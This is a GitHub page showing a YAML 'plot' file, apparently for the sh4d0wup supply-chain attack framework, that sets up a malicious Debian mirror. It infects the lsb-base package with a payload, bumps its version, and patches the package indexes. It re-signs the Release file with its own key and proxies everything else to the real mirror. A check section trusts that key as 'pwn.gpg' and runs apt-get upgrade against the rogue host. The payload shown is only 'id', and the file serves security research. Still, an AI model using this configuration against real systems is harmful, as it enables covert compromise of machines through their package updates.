-
-
Notifications
You must be signed in to change notification settings - Fork 12
/
plot-debian.yaml
111 lines (101 loc) · 2.91 KB
/
plot-debian.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
---
upstreams:
debian:
url: https://deb.debian.org/
signing_keys:
apt:
type: pgp
uids: ["Debian Archive Automatic Signing Key (11/bullseye) <[email protected]>"]
artifacts:
release_upstream:
type: url
url: https://deb.debian.org/debian/dists/stable/InRelease
index_upstream:
type: url
url: https://deb.debian.org/debian/dists/stable/main/binary-amd64/Packages.xz
pkg_upstream:
type: url
url: https://deb.debian.org/debian/pool/main/l/lsb/lsb-base_11.1.0_all.deb
sha256: 89ed6332074d827a65305f9a51e591dff20641d61ff5e11f4e1822a9987e96fe
pkg_infected:
type: infect
infect: deb
artifact: pkg_upstream
payload: id
index_patched:
type: tamper
tamper: patch-apt-package-list
artifact: index_upstream
compression: none
patch:
- name: lsb-base
artifact: pkg_infected
set:
Version:
- 11.1337.0
Filename:
- pool/main/l/lsb/lsb-base_11.1337.0_all.deb
index_patched_gz:
type: compress
compression: gzip
artifact: index_patched
index_patched_xz:
type: compress
compression: xz
artifact: index_patched
release_patched:
type: tamper
tamper: patch-apt-release
artifact: release_upstream
signing_key: apt
patch:
- name: main/binary-amd64/Packages
artifact: index_patched
- name: main/binary-amd64/Packages.gz
artifact: index_patched_gz
- name: main/binary-amd64/Packages.xz
artifact: index_patched_xz
check:
image: debian:stable
install_keys:
- key: apt
binary: true
cmd: 'tee /etc/apt/trusted.gpg.d/pwn.gpg > /dev/null'
cmds:
- 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian stable main" | tee /etc/apt/sources.list'
- 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian-security stable-security main" | tee -a /etc/apt/sources.list'
- 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian stable-updates main" | tee -a /etc/apt/sources.list'
- ["apt-get", "update"]
- ["env", "DEBIAN_FRONTEND=noninteractive", "apt-get", "upgrade", "-y"]
routes:
- path: /debian/dists/stable/InRelease
type: static
args:
artifact: release_patched
- type: static
args:
path_template: "/debian/dists/stable/main/binary-amd64/by-hash/SHA256/{{sha256}}"
artifacts:
- index_patched
- index_patched_gz
- index_patched_xz
- pkg_infected
- path: /debian/dists/stable/main/binary-amd64/Packages
type: static
args:
artifact: index_patched
- path: /debian/dists/stable/main/binary-amd64/Packages.gz
type: static
args:
artifact: index_patched_gz
- path: /debian/dists/stable/main/binary-amd64/Packages.xz
type: static
args:
artifact: index_patched_xz
- path: /debian/pool/main/l/lsb/lsb-base_11.1337.0_all.deb
type: static
args:
artifact: pkg_infected
- type: proxy
args:
upstream: debian